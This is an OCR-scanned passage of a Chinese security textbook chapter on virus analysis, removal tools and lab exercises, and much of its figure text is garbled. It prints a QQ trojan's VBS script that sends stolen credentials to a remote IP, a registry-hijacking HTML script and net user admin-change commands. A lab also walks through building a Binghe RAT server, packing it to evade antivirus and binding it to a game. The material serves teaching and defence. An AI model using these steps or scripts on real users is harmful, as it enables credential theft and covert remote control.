数值 数据 四: 
C: WINDOWS\system32 逻 尝 到 











图 4-11 删除 病毒 启动 项 
4.2.3 ”木马 病毒 一 -QQ 粘 虫 病毒 


木马 (Trojan) 也 称 木 马 病毒 ， 是 指 通过 特定 的 程序 (木马 程序 ) 来 控制 另 一 台 计算 机 。 木 
马 通常 有 两 个 可 执行 程序 ， 一 个 是 控制 端 ， 另 一 个 是 被 控制 端 。 木 马 这 个 名 字 来 源 于 古 希 
腊 传说 ( 荷 马 史诗 中 木马 计 的 故事 ，Trojan 一 词 的 特洛伊 木马 本 意 是 特洛伊 的 ， 即 代 指 特 洛 
伊 木马 )。 木 马 程序 是 目前 比较 流行 的 病毒 文件 ， 与 一 般 的 病毒 不 同 ， 它 不 会 自我 繁殖 ， 也 
并 不 “刻意 ”地 去 感染 其 他 文件 ， 它 通过 将 自身 伪装 以 吸引 用 户 下 载 执行 ， 向 施 种 木马 者 
提供 打开 被 种 主机 的 门户 ， 使 施 种 者 可 以 任意 毁坏 、 窃 取 被 种 者 的 文件 ， 甚 至 远程 操控 被 
种 主机 。 木 马 病毒 的 产生 严重 危害 着 现代 网 络 的 安全 运行 。 


1.， QQ 粘 虫 病毒 概述 


该 病毒 是 网 络 病毒 的 一 种 ， 它 干扰 正常 QQ 登录 ， 将 假 的 QQ 登录 窗口 伪造 得 惟 妙 惟 
肖 ， 再 谎 称 “所 谓 QQ 刷 钼 工具 ”传播 。 

此 类 病毒 主要 通过 两 个 渠道 传播 : 一 是 伪装 成 QQ 刷 钻 工 具 、 游 戏 外 挂 ， 另 一 种 是 伪 
装 成 各 种 QQ 好 友 发 送 的 文件 ， 主 要 以 办 公文 件 为 主 。 

病毒 为 完成 盗号 创建 了 多 个 病毒 程序 模块 ， 各 模块 分 工 协作 共同 完成 盗号 过 程 。 其 中 
一 个 每 200ms 自动 将 正常 的 QQ 登录 窗口 最 小 化 ， 另 一 个 则 将 伪造 的 QQ 登录 窗口 展示 在 
屏幕 中 央 ， 欺 骗 用 户 登录 。 同 时 ， 病 毒 还 有 一 个 子 程序 将 记录 下 来 的 QQ 号 和 密码 发 到 远 
程 服务 器 。2014 年 7 月 1 日 ， 该 病毒 再 次 变种 ， 针 对 公司 办 公 人 员 ， 利 用 盗 取 到 的 QQ 账 
号 密码 向 好 友 发 送 文件 。 


2. QQ 粘 虫 病毒 样本 分 析 


使 用 QQ 账号 登录 ， 运 行 病毒 文件 。 过 一 会 儿 ， 系 统 桌面 弹出 一 个 QQ 出 错 重 新 登录 
的 对 话 框 。 双 击 一 下 托盘 图 标 ， 看 能 否 显示 出 已 登录 的 QQ 主 界 面 。 双 击 之 后 界面 并 不 显 
示 ， 立 刻 变 成 了 最 小 化 ， 原 来 登录 的 QQ 不 能 查看 。 

Process Monitor 是 一 款 系 统 进程 监视 软件 。 使 用 Process Monitor 的 抓 弹 窗口 功能 ， 来 
看 一 下 这 个 对 话 框 是 由 哪个 系统 进程 弹出 的 。 用 鼠标 单 击 十 字形 图 标 ， 使 用 拖 搜 将 其 放置 
到 那个 登录 的 对 话 框 上 ，Process Monitor 自动 将 进程 名 称 为 重要 资料 .exe 捕获 到 操作 内 容 
全 部 列 出 ， 如 图 4-12 所 示 。 也 就 是 说 这 个 登录 对 话 框 是 重要 资料 .exe 创建 的 ， 并 不 是 正常 
的 QQ 主 程序 QQ.exe 创建 的 。 


/ee\. 
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图 4-12 ”病毒 山寨 的 重新 登录 QQ 的 对 话 框 
【知识 应 用 一 一 Process Monitor】 


Process Monitor 是 一 款 系 统 进程 监视 软件 ， 总 体 来 说 ，Process Monitor 相当 于 
Filemon+Regmon， 其 中 的 Filemon 专门 用 来 监视 系统 中 的 任何 文件 操作 过 程 ， 而 Regmon 
用 来 监视 注册 表 的 读 写 操作 过 程 。 有 了 Process Monitor， 使 用 者 就 可 以 对 系统 中 的 文件 和 
注册 表 操作 同时 进行 监视 和 记录 ， 通 过 注册 表 和 文件 读 写 的 变化 ， 帮 助 诊断 系统 故障 或 是 
发 现 恶意 软件 、 病 毒 或 木马 。 这 是 一 个 高 级 的 Windows 系统 和 应 用 程序 监视 工具 ， 由 优秀 
的 Sysinternals 开发 ， 并 且 目 前 已 并 入 微软 底下， 可靠 性 自 不 用 说 。 


为 了 更 好 地 演示 该 病毒 如 何 盗号 ， 我 们 在 病毒 弹出 的 重新 登录 对 话 框 中 输入 密码 后 登 
录 试 一 下 。 输 入 密码 并 登录 后 ， 在 山寨 的 QQ 出 错 登 录 界面 显示 出 “密码 错误 ， 请 重新 输 
入 ”， 如 图 4-13 所 示 。 


为 了 您 的 帐号 安全 ， 需 要 您 重新 输入 密码 进行 身 
份 验证 继续 警 录 
帐号 : 


2793681582 
密码 





上 

宪 码 情 温 , 请 重新 输入 
[a |] [| ww ] 

图 4-13 ”密码 错误 提示 


对 比 一 下 Process Monitor 抓 到 了 什么 。 最 初 Process Monitor 监视 到 的 病毒 行为 ， 都 是 
进程 启动 、 线 程 创 建 、 查 询 名 称 信息 等 内 容 ， 这 些 都 不 是 我 们 想 要 的 ， 但 写 入 文件 和 设置 
注册 表 键 值 这 些 是 我 们 需要 的 。 仔 细 查 看 后 我 们 发 现 ， 病 毒 样本 “重要 资料 .exe” 在 系统 
临时 目录 下 成 功 写 入 了 文件 ， 如 图 4-14 所 示 。 


济 重要 法 村 .eze 3228 草 关闭 文 作 C:AWINDOWSAs7sten32VwscriDt exe 

四 重要 资料 .eze 3228 加 该 取 文 作 C:ARINDOWS\s7stem32Amsvcp50. dl1 

a 本 本 次 笠 。 eze ”3228 于 创建 文 作 C:ADocunments and nn Settings\Temp\temp” 
要 22 写 入 文 任 s 

















a 资料 . ez 3228 器 关闭 文 作 C: VDoewments and Settings\swhLocal Settines\Temp\temp 
六 重要 资料 .eze 3228 时 创建 文 作 C: \RINDORS\s7stem32\wscript. exe 
站 重要 资料 . exze 3228 时 创建 文 作 献 射 。C: WINDORS\s7stem32\wscript. exe 
自重 要 资料 . eze 3228 购 创 律 立 任 除 射 。 C: MWINDORS\srstem32\wscript. eze 


图 4-14 ”病毒 在 临时 系统 目录 下 写 入 文件 


.se 


人 rr 


从 图 4-14 可 以 看 到 ， 病 毒 在 C:\Documents and Settings\aaa\Local Settings\Temp\ 目 录 下 
写 入 了 一 个 temp4762. vbs 脚本 ， 如 图 4-15 所 示 。 





文件 中 蚁 性 到 ) 格式 @) 查看 人 帮助 人 

set ie-createobject("internetexplorer-application") 

ie.visible=FALSE 
ie.navigate("http://59.115.134.169:6565/senddata.asp?1"2793681582&2"chiess123&3=hhn") 
do until ie.readystate™h 


loop 
set ie-nothing 


4-15 ”病毒 写 入 的 脚本 
具体 代码 内 容 如 下 : 
set ie=createobject ("internetexplorer.application") 


ie.visible=FALSE 


ie.navigate ("http://50.115.134.169:6565/senddata.asp?1=2793681582&2=chiese 
123&&3=hhn") 


do until ie.readystate=4 
loop 
Set ie-nothing 


这 段 代 码 的 大 致意 思 ， 让 正 浏览 器 以 隐藏 方式 访问 http://50.115.134.169:6565/senddata. 
asp?1=2793681582&2=chiese123&&3=hhn 页 面 ， 将 QQ 账号 和 密码 以 get 方式 发 送 到 
50.115.134.169 域名 的 senddata.asp 页 面 ， 而 senddata.asp 页 面 就 是 病毒 作者 在 远 端 服务 器 
上 事先 写 好 的 收 信 页 面 代码 。 这 样 ， 在 山寨 的 QQ 出 错 界 面 输入 密码 并 登录 后 ，QQ 账号 
和 密码 将 被 盗 走 。 


3. QQ 盗号 病毒 的 清除 


病毒 运行 后 ， 会 山寨 出 一 个 QQ 出 错 登录 界面 ， 同 时 会 不 断 隐藏 正常 QQ 界面 ， 使 得 
正常 QQ 的 界面 无 法 使 用 ， 诱 骗 用 户 认为 QQ 出 错 ， 输 入 QQ 密码 重新 登录 。 随 后 ， 病 毒 
会 执行 VBS 脚本 ， 使 用 VBS 脚本 发 送 盗 取 的 QQ 账号 和 密码 到 病毒 作者 的 服务 器 上 。 这 
个 病毒 手动 处 理 起 来 也 很 简单 ， 在 任务 管理 器 里 结束 “重要 资料 .exe” 进 程 ， 并 手动 删除 
病毒 文件 即 可 。 


4. QQ 盗号 病毒 的 防范 


这 类 病毒 大 多 是 因为 单 击 了 好 友 发 过 来 的 病毒 链接 或 病毒 文件 ， 从 源头 上 堵 住 这 个 病 
毒 ， 不 单 击 、 不 接收 病毒 链接 和 文件 即 可 。 如 果 把 QQ 文件 传输 的 安全 级 别 设置 为 
“高 ”， 就 可 以 阻止 接收 任何 文件 ， 这 样 好 友 向 你 发 送 的 文件 就 会 被 自动 拒绝 。 这 样 虽然 
可 以 防范 病毒 ， 但 也 影响 了 自己 的 正常 操作 。 

也 可 以 使 用 一 些 安全 工具 ， 如 QQKav。QQKav 提供 了 3 种 安全 措施 : 屏蔽 恶意 网 
站 、 屏 蔽 QQ 尾巴 消息 和 屏蔽 好 友 发 送 病毒 ， 将 这 3 项 分 别 选中 ， 就 可 以 防范 此 类 病毒 。 





oa. 
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4.2.4 ”木马 病毒 一 禹 竹 杠 木马 


1. 敲 竹 杠 木马 概述 

敲 竹 杠 木马 主要 通过 QQ 群 和 邮件 传播 ， 经 常会 伪装 成 “CF 免费 刷 枪 无 毒 软件 ”“ 免 
费 刷 Q 币 ” 等 极 具 诱 惑 性 的 标题 ， 一 旦 用 户 点 击 运行 ， 系 统 登录 密码 就 会 被 算 改 。 

2. 敲 竹 杠 木马 分 析 


中 了 敲 竹 杠 木马 的 典型 现象 就 是 系统 密码 被 算 改 ， 无 法 进入 系统 ， 并 且 给 出 获取 开机 
密码 的 联系 方式 等 信息 ， 如 图 4-16 所 示 。 





获取 开机 密 矶 清 联 系 0Q FEW999WD 对 付 通 名称 15 QB20 合营 第 一 





4-16 ”项 竹 杠 


这 一 类 木马 主要 是 通过 net 命令 来 修改 管理 员 的 密码 ， 然 后 利用 设置 注册 表 相 关 的 信 
息 来 通知 受害 人 联系 木马 作者 的 QQ 号 。 对 于 简单 的 木马 ， 使 用 记事 本 打开 可 以 找到 密 
码 ， 如 “ 财 付 通 ” 这 个 敲 竹 杠 木马 就 可 以 ， 在 记事 本 里 找到 开机 密码 为 wyc188， 如 图 4-17 
所 示 。 






文件 四 凡 弹 里】 梯 式 册 ] 查看 G 而 把 员 


于 标签 6 加 $ 8 a l Y £3 下 
- . C 
i 有 es ， 侈 
- 时 nnn Vy EE a 
! nf 站 n> 0 ' 
区 - 时 站 吐 mm 
a “修改 密码 nt 标签 3 a 和 
上 - a na 
nnn & 1! 下 载 nt 于 a 中 中 囊 
1 下 一 a LT [全 消 
nn VU nnn 间 } 室友 nt 标签 1 HH . 
9 ; ES 一 日 mn yy wn 
赋 my mm 1 账号 Y 志 议 辑 框 * 
Ea DD 1 区 ~- 让 
- 上 " ¥E 3 
¥ ¥ 革 
编辑 框 2 是: 时 a! 了 ¥ 
"起 疯 二 > 日 ,二 mc188 
二 ‘ 
二 ”和 并 
\¥ -二 瑞 三 s a 


,二 王 字 蚌 0qa1471252 
上 ~ 纲 丈 { 0 相 。 去 记 2 2 


图 4-17 记事 本 里 找到 开机 密码 
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也 可 以 通过 哈 勃 分 析 系 统 分 析 样 本 的 行为 ， 找 到 文件 的 密码 ， 如 图 4-18 所 示 。 


文件 名 称 一 卡 至 施舍 (1]).exe 

MD5 a6b07d8d0ea42a75790958930fff054f 
文件 类 型 EXE 

上 传 时 间 2015-09-07 11:25:39 

出 品 公司 QQ 市 堵 

版 本 1000---100.0 

壳 或 病 译 器 信息 COMPILER:Elan 


pm 
关键 行为 

行为 拉 还 : 写 各 限 缺 射 文 件 

详情 信息 : CiceroSharedMemDefaultS-* 
行为 搞 还 ; 修改 用 户 窗 码 


详情 信息 ; ImagePath = , CmdLine = net user administrator jay, 





详情 信息 ; ImagePath = , CmdLine = net localgroup administrators 第 子 地 豆 你 /add 


4-18 ” 险 勃 分 析 系统 分 析 结 果 


【知识 拓展 一 一 哈 勃 分 析 系统 】 


哈 勃 分 析 系统 是 腾讯 反 病 毒 实验 室 自主 研发 的 安全 辅助 平台 。 用 户 可 以 通过 简单 的 操 
作 ， 上 传 样本 并 得 知 样本 的 基本 信息 、 可 能 产生 的 行为 、 安 全 等 级 等 ， 从 而 更 便捷 地 识别 
恶意 文件 。 


4.3 专 杀 工具 的 编写 


4.3.1 专 杀 工 具 的 编写 一 -自动 播放 病毒 2 


1. 自动 播放 病毒 2 的 现象 


在 虚拟 机 中 运行 病毒 样本 ， 病 毒 发 作 后 的 现象 如 下 。 
(1) 在 病毒 样本 相同 路 径 下 生成 文件 oso.exe， 如 图 4-19 所 示 。 





回 z:\ 病 毒 样本 \ 自 动 播放 病毒 2\ 自 动 播放 2 








图 4-19 生成 文件 oso.exe 
/oN. 
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(2) 抑制 杀毒 软件 等 安全 工具 。 
(3) 在 王 盘 下 生成 autoruninf 文件 ， 用 记事 本 打开 该 文件 ， 其 内 容 如 图 4-20 所 示 。 
































外 autorun. inf - 记事 本 


文件 @) 编辑 人 E) 格式 @) 查看 @) 帮助 0) 
[autoRun] 
open=0S0 .exe 


Sshellexecute=0S0 .exe 
shell\Auto\command=0S0 .exe 





图 4-20 autorun.inf 文件 


(4) 使 用 瑞星 听诊 器 扫描 可 以 得 到 听诊 信息 ， 在 听诊 信息 的 未 知 家 族 分 析 中 ， 锁 定 3 
个 文件 ， 注 意 文件 路 径 ， 如 图 4-21 所 示 。 
加 瑞星 听诊 器 4.4 分 析 信息 - 于 icrosol ft Internet Explorer 
文件 @) ”编辑 下 ) 查看 外 这 由 ) 工具 C) 帮助 0D 
习 国 全 万 睦 南 bx 鼠 


站 | ma Settings\vsw\ 点 面 \ 分 析 工具 \ 瑞 星 听诊 信息 .htm w 转 到 许 





图 4-21 未 知 家 族 病毒 分 析 


(5) 在 听诊 信息 的 进程 中 ， 注 意 进 程 conime，mmucj 和 server。 
(6) 在 听诊 信息 的 普通 启动 项 中 ， 注 意 两 个 启动 项 mmucj 和 severe， 如 图 4-22 所 示 。 
(7) 在 听诊 信息 的 其 他 启动 项 中 ， 注 意 conime。 


2. 编写 自动 播放 病毒 2 的 专 杀 工具 


(1) 编写 批 处 理 文件 ， 结 束 病毒 进程 ， 如 图 4-23 所 示 。 

(2) 编写 批 处 理 文 件 ， 删 除 drivers 路 径 下 文件 ， 如 图 4-24 所 示 。 
(3) 编写 批 处 理 文件 ， 删 除 system32 路 径 下 文件 ， 如 图 4-25 所 示 。 
(4) 编写 批 处 理 文件 ， 删 除 E 盘 路 径 下 文件 ， 如 图 4-26 所 示 。 
(5) 编写 批 处 理 文件 ， 删 除 病毒 启动 项 ， 如 图 4-27 所 示 。 
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EE EEE licrosoft Internet Erplorer 





文件 久 宫 下 查理 WD 收 豪 风 ”工具 型 助 中 
国 国 但 忆 瑟 责 szx 加 全 -全国 加 
面 \ 分 析 工 具 \ 瑞 星 昕 hw 图 到 和 二 ” 图 全 全 助 - 铝 广 告 拦截 合 系 统 修复 





图 4-22 普通 启动 项 








j〗 结束 病毒 进程 ,bat - 记事 本 了 浏 除 drivers 篷 径 下 文件 bat - 记事 本 | 3 
Qecho off cd C:\WIND MS\system32\drivers 
taskkill /f /im conime. exe /t attrib conime, exe -a 十 





taskkill /f /im mmlucj.exe /t Ub oripLit: ee eH 


: 站 del /s /q /f conime. 
taskkill /f /im severe.exe /t Ve 


4-23 ”结束 病毒 进程 图 4-24 ”删除 drivers 路 径 下 文件 





中 测 除 system32 路 径 下 文件 .bat - 记事 本 A 相 滑 除 E 盘 路 径 下 文件 bat - 记事 本 二 


E: 
attrib autorun. inf -a -h -s 
del /s /q /f autorun. inf 






attrib mml 
del /s /q 









图 4-25 删除 system32 路 径 下 文件 图 4-26 删除 E 盘 下 文件 
| 了 伦 启 动 硕 bat - 记事 本 一 一 当 (= © es 





文件 (月 ” 妨 加 (日 ”格式 (O) 可 看 (V) 帮助 (H) 


reg delete HELM\SOFTWARE\NMicrosoft\Windows\CurrentVYersion\run /vy mmlucj /f 
i delete HKLNM\SOFTWARE\NMicrosoft\Windows\CurrentVersion\run /v avipit /f 





图 4-27 删除 E 盘 下 文件 
(6) 将 上 述 批 处 理 文件 合并 到 一 个 批 处 理 文件 ， 即 自动 播放 病毒 2 专 杀 工 具 。 


4.3.2 ” 专 杀 工具 的 编写 一 -熊猫 烧香 病毒 





熊猫 烧香 病毒 的 现象 和 分 析 在 4.2.2 节 已 经 介绍 。 根 据 熊猫 烧香 病毒 的 分 析 ， 可 编写 
/od. 
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如 下 专 杀 工具 。 
(1) 编写 批 处 理 文件 ， 结 束 病毒 进程 ， 如 图 4-28 所 示 。 
(2) 编写 批 处 理 文件 ， 删 除 drivers 路 径 下 文件 ， 如 图 4-29 所 示 。 


可 结束 病毒 进程 ,bat - 记事 本 


| 文才。 闹 踢 日“ 楷 ER(O) 喜 在 M 者 助 (H) 
mecho off attrib spo0lsv. exe -a -h 
taskkill /f /im spo01sv. exe /t del /s /q /f spo0lsv. exe 









































4-28 ”结束 病毒 进程 4-29 删除 drivers 路 径 下 文件 
(3) 编写 批 处 理 文件 ， 删 除根 目录 下 文件 ， 如 图 4-30 所 示 。 


ey Vs /q /f autorun inf 


attrib Setup. exe -a -h -s 
attrib autorun.inf -a -h -s 
del /s /q /f setup.exe 

del /s /q /f autorun. inf 





图 4-30 ”删除 根 目录 下 文件 
(4) 编写 批 处 理 文件 ， 删 除 病毒 启动 项 ， 如 图 4-31 所 示 。 


eg delete HECU\SOFTWARE\icrosoft\Windows\CurrentVersion\run /v “sveshare” /f 








图 4-31 删除 病毒 启动 项 
(5) 编写 批 处 理 文件 ， 修 改 注册 表 键 值 ， 恢 复 “ 显 示 所 有 文件 和 文件 夹 ”， 如 图 4-32 
所 示 。 





keg del ete HRLIN\SOFTHARE MG crosoft \Windows\CurrentVersi an\explorer 
Ri der\Hidden\SHOWALL /v“Checkedyalue”/ 
Teg add HKLICNSOFTWARENJicrosoftAWindowsYCurrentVersi D1 时 armneed 


\Folder\Hidden\SHOWALL /v “CheckedYalue” /t “REG_DWO 








图 4-32 恢复 “显示 所 有 文件 和 文件 夹 ” 
将 上 述 批 处 理 文件 合并 到 一 个 批 处 理 文件 ， 即 熊猫 烧香 专 杀 工具 。 
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4.4 小 型 案例 实 训 
4.4.1 ”蠕虫 病毒 分 析 


为 了 保证 病毒 不 感染 用 户 数据 文件 ， 本 实验 需要 在 安装 Windows 7/XP 系统 的 “虚拟 
机 ”环境 下 进行 。 虚 拟 机 系统 下 需要 安装 Foxmail、UltraEdit 以 及 Office 等 工具 软件 。 


1. Sircam 病毒 的 清除 
Sircam 病毒 是 一 个 很 典型 的 蠕虫 病毒 ， 其 特点 是 将 被 感染 用 户 的 文件 向 外 发 送 ， 泄 露 
用 户 的 秘密 和 个 人 隐私 。Sircam 使 用 双 扩 展 名 技术 实现 自我 隐藏 。 


(1) 取消 选中 “文件 夹 选项 ”对 话 框 中 的 “隐藏 已 知 文件 类 型 的 扩展 名 ” 复 选 框 ， 观 
察 被 病毒 感染 文件 的 双 扩展 名 ， 如 图 4-33 所 示 。 


| 第 规 查看 “文件 类 型 】 脱 机 文件 


文件 赤 视 图 | 
[rn 
El 





高级 设置 
回 隐 填 受 保护 的 拘 作 系统 文件 (推荐 ) ~ 


口 在 标题 栏 
中 打开 文件 到 窗口 


口 在 单独 的 进 

口 在 登录 时 还 原 上 一 个 文件 夹 窗口 

回 在 地 址 栏 中 显示 完整 路 径 | 
回 在 文件 夹 提示 中 显示 文件 大 小 信息 病 | 


还 原 为 默认 值 @) 














取消 ] [_ 应用) 











4-33 ”显示 文件 扩展 名 


(2) 用 UltraEdit 工具 打开 这 个 带 毒 文件 。 

(3) 查找 被 病毒 感染 之 前 文件 的 头 标 志 。 

(4) 删除 头 标 志 之 前 的 所 有 病毒 体 ， 然 后 保存 文件 。 
(5) 打开 已 经 挽救 的 文件 ， 观 察 实验 效果 。 


2. 查看 隐藏 在 邮件 中 的 文件 


很 多 蠕虫 病毒 都 将 病毒 文件 隐藏 在 邮件 正文 中 ， 并 且 利用 邮件 系统 的 漏洞 ， 使 用 户 在 
点 击 该 邮件 时 就 会 发 作 。 例 如 ， 尼 姆 达 病毒 就 是 采用 这 种 隐藏 方式 。 

(1) 打开 Foxmail 中 的 病毒 邮件 。 

(2) 选择 详细 信息 查看 。 

(3) 查看 隐藏 文件 的 特征 。 

(4) 运行 该 邮件 病毒 。 

(5) 用 UltraEdit 工具 打开 病毒 邮件 文件 和 正常 邮件 文件 。 
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(6) 把 带 毒 邮件 的 病毒 体 部 分 删除 ， 并 用 正常 邮件 文件 的 头 信息 蔡 换 带 毒 邮 件 的 头 


4.4.2 ”网 页 脚本 病毒 分 析 


为 了 保证 病毒 不 感染 用 户 数据 文件 ， 本 实验 需要 在 安装 了 Windows 7/XP 系统 的 “ 虚 
拟 机 ”环境 下 进行 。 虚 拟 机 系统 下 需要 安装 Foxmail、UltraEdit 以 及 Office 等 工具 软件 。 


1. 注册 表 恶意 修改 
(1) 打开 记事 本 ， 编 辑 如 下 脚本 内 容 ， 把 文件 保存 为 “修改 注册 表 .htm”。 


<head> 
<title> 测 试 脚本 </title> 
</head> 


<body> 
<OBJECT classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B id=wsh> 
</OBJECT><SCRIPT> 


// 以 下 内 容 为 对 注册 表 的 修改 
// 修 改 IE 中 的 主页 设置 为 www.103456.com 


wsh.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main 
\\Start Page", "http://www.103456.com"); 


// 隐 藏 驱动 器 C 

wsh.RegWrite ("HKCU\Software\\Microsoft\\Windows\\CurrentVersion 
\\Policies\\Explorer\\NoDrives","00000004", "REG DWORD"); 
</script> 

</body> 

</html> 


(2) 运行 “修改 注册 表 .htm” 文 件 。 
(3) 打开 正 浏 览 器 的 属性 窗口 ， 查 看 主页 地 址 ， 如 图 4-34 所 示 。 


[天 [全 [BB% | 内 容 程序 “高 级 
主页 
(Be 
地 址 8) 
使 用 当前 页 C) | | 使 用 默认 页 @) | | 使 用 空白 页 @) 











Internet 临时 文件 
a sy 入 人 天 中 +， 这 样 可 以 


Cookies DD)...] 痢 隐 文件 中 ET 























历史 记录 
vi stary” 文件 到 中 和 全 有 已 沪 问 页 的 儿 接 ,可 使 用 记忆 
| 避让 


网 页 保存 在 历史 记录 中 的 天 数 全 ) |20 因 | [ 清除 历史 记录 











| [Ro [3#v.. |] [证 四 ] 随 肋 芭 能 四 











Cj Caw] 





图 4-34 查看 主页 地 址 
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(4) 注销 系统 ， 然 后 在 “我 的 电脑 ”窗口 中 查看 C 盘 是 否 被 隐藏 ， 如 图 4-35 所 示 


我 电 议 BEE 
文件 到 ) ” 蝙 辑 下 ) 查看 WD 转 到 G) 收 意 愉 帮助 中 
+ 





| 
本 前 先 -型 | 前 上 电 | 品 | 烽 左 | 贺 - 


地 址 加 [局 我 的 电脑 














A 





图 4-35 查看 C 盘 是 否 隐藏 
2. 脚本 防护 处 理 及 反 修 改 


对 于 被 脚本 及 恶意 网 页 造成 的 破坏 ， 我 们 可 以 通过 在 注册 表 中 删除 不 需要 的 键 值 和 修 
改 被 算 改 的 键 值 的 手段 进行 修复 ， 在 此 不 做 介绍 。 

通过 禁用 WSH， 可 以 达到 彻底 禁止 脚本 运行 的 效果 。 

(1) 双击 “我 的 电脑 ”图 标 ， 然 后 执行 “工具 ”一 “文件 夹 选 项 ”命令 。 

(2) 在 “文件 夹 选 项 ”窗口 中 ， 选 择 “ 文 件 类 型 ”选项 卡 ， 找 到 VBS VBScript Script 
File 选项 ， 如 图 4-36 所 示 

(3) 单 击 “ 删 除 ” 按 钮 ， 最 后 单 击 “确定 ”按钮 。 


文件 去 选项 


这 现下 看 “文件 英 到 | 服 机 文件 
已 注册 的 文件 类 型 0D) 





HAR Merosot C) Mindews [RO | 


扩展 名 为 Bs” VBSeript Seript 了 is 
Ms. 


as cript Script File” 文件 的 设 














图 4-36 “文件 类 型 ”选项 卡 
4.4.3 ”木马 的 防 杀 与 种 植 


【知识 拓展 





冰河 木马 】 


冰河 木马 开发 于 1999 年 ， 跟 灰 鲍 子 类 似 。 在 设计 之 初 ， 开发 者 的 本 意 是 编写 一 个 功能 
强大 的 远程 控制 软件 。 但 一 经 推出 ， 就 依靠 其 强大 的 功能 成 为 黑客 们 发 动 入 侵 的 工具 ， 并 
.oa\. 


第 4 章 ， 病 毒 分 析 与 防御 属 4 和 


结束 了 国外 木马 一 统 天 下 的 局 面 ， 跟 后 来 的 灰 鲍 子 等 成 为 国产 木马 的 标志 和 代名词 。 
在 2006 年 之 前 ,冰河 在 国内 一 直 是 不 可 动摇 的 领军 木马 ， 在 国内 没 用 过 冰河 的 人 等 


于 没 用 过 木马 ， 由 此 可 见 冰河 木马 在 国内 的 影响 力 之 巨大 。 
为 了 保证 病毒 不 感染 用 户 数据 文件 ， 本 实验 需要 在 安装 了 Windows 7/XP 系统 的 “ 虚 
拟 机 ”环境 下 进行 。 虚 拟 机 系统 下 需要 安装 Foxmail、UltraEdit 以 及 Office 等 工具 软件 。 


1) 配置 冰河 木马 服务 端 
(1) 双击 G_CLIENTEXE， 打 开 冰 河 客户 端 ， 如 图 4-37 所 示 。 注 意 千 万 不 要 双击 


G_SERVER.EXE。 


冰河 V8.4 [NEWFUN 专 版 ] 
文件 [四 pr] 识 年 [E] 者 助 时 


强 邵 到 里 国 币 司 男 赴 白 了 
当 放 和 业 : [Lecaliost 司 Wo: wn$:|[ 庶 用 [3] 
司 文 ieg | 昌 和 jG | 
Fay 











1 国 呈 ca 














图 4-37 ”打开 冰河 客户 端 

(2) 选择 “设置 ”一 “服务 器 配置 ”菜单 命令 ， 打 开 “ 服 务 器 配置 ”窗口 ， 进 行 基 
本 设置 ， 如 图 4-38 所 示 。 

(3) 单 击 “ 确 定 ” 按 钮 ， 生 成 服务 器 端 程序 。 

2) 免 杀 木马 制作 一 一 木马 加 壳 

(1) 对 上 一 步 生成 的 木马 服务 器 端 程序 进行 病毒 扫描 。 

(2) 打开 ncphpack.exe 程序 ， 单 击 “ 打 开 ” 按 钮 选择 木马 服务 器 端 程序 ， 单 击 “ 保 
护 ”按钮 ， 完 成 对 木马 服务 器 端的 加 壳 保护， 如 图 4-39 所 示 。 

(3) 对 加 壳 后 的 木马 服务 器 端 程序 进行 病毒 扫描 。 


` 服务 器 配置 
图 基本 设置 | 一 P| 得 帮 件 洒 知 | 





和 六 中 径 : | Sr 隔 Fa 称 : 








进程 名 称 : nions 访问 口令 : 








二 大 字符 :同人 本 疝 这 扔 本 录 帐户 password cornect aceonnt, Jogin Logom 





提示 信息 : 
生 听 端口 : "526 。。。。 厂 自动 骨 除 安 半 文件 末 禁止 自动 核 号 








| 确定 


图 4-38 “服务 器 配置 ”窗口 图 4-39 ncphpack.exe 程序 
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3) 种 植木 马 

把 上 一 步 生成 的 木马 服务 器 端 与 一 个 exe 文件 合并 。 打 开 捆 绑 工具 deception.exe， 单 
击 第 一 个 set 按钮 ， 指 定 一 个 exe 文件 的 路 径 ， 比 如 游戏 程序 “五 子 连 珠 .exe” 的 路 径 。 单 
击 第 二 个 set 按钮 ， 指 定 木马 服务 端 程序 G-SERVER.EXE 的 路 径 。 设 置 运 行 选项 ， 如 图 4-40 
所 示 。 

Deception 中 有 3 个 运行 选项 ， 说 明 如 下 。 

@ Run Hidden: 隐藏 运行 。 

@ Add to Registry: 加 入 注册 表 ， 使 木马 服务 端 随 计算 机 启动 自动 运行 。 

@ Fake Eror: 弹出 错误 消息 。 

这 里 可 以 任意 选择 ， 尝 试 每 一 项 的 功能 ! 





4-40 deception.exe 程序 


最 后 单 击 Bind 按钮 进行 捆绑 操作 ， 生 成 捆绑 文件 。 

通过 以 上 过 程 ， 捆 绑 了 木马 和 小 游戏 的 新 文件 BINDED.EXE 就 生成 了 。 然 后 把 该 文 
件 名 改 成 “五 子 连珠 .exe”。 把 该 文件 传 给 其 他 同学 ， 并 运行 。 那 么 对 方 看 到 的 只 是 小 游 
戏 “ 五 子 连珠 ”的 界面 ， 而 木马 服务 端 程序 已 经 悄然 运行 了 。 

木马 服务 端 除 了 可 以 与 exe 文件 绑 定 之 外 ， 还 可 以 与 文本 文件 、 图 片 文件 等 进行 绑 
定 ， 实 现 隐藏 自己 的 目的 。 过 程 与 上 面 类 似 ， 在 此 不 作 效 述 。 


本 章 小 结 


本 章 对 计算 机 病毒 的 相关 知识 进行 了 介绍 ， 重 点 讲述 了 目前 最 为 流行 的 两 种 病毒 一 一 
蠕虫 病毒 和 木马 病毒 ， 分 别 分 析 了 这 两 种 病毒 的 典型 案例 ， 介 绍 了 专 杀 工具 的 编写 方法 。 


习 题 
一 、 选 择 题 
1. 熊猫 烧香 病毒 是 哪 种 病毒 ?2 ( 。 ) 
A. 蠕虫 病毒 B. 木马 病毒 C. 宏 病毒 D. 脚本 病毒 
2. 计算 机 病毒 是 (  )。 
A. 被 损坏 的 程序 B. 硬件 故障 


/110. 


i 
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C. 一 段 特制 的 程序 D. 芯片 霉 变 

计算 机 病毒 的 危害 主要 造成 (。 )。 

A. 磁盘 破坏 B. 计算 机 用 户 的 伤害 

C. CPU 的 损坏 D. 程序 和 数据 的 破坏 

下 列 病毒 中 ，( ”) 计 算 机 病毒 不 是 蠕虫 病毒 。 

A. 冲击 波 B. 震荡 波 C. CIH D. 尼 姆 达 


以 下 关于 计算 机 病毒 的 特征 说 法 正确 的 是 ( )。 
A. 计算 机 病毒 只 具有 破坏 性 ， 没 有 其 他 特征 

B. 计算 机 病毒 具有 破坏 性 ， 不 具有 传染 性 

C. 破坏 性 和 传染 性 是 计算 机 病毒 的 两 大 主要 特征 
D. 计算 机 病毒 只 具有 传染 性 ， 不 具有 破坏 性 


操作 题 


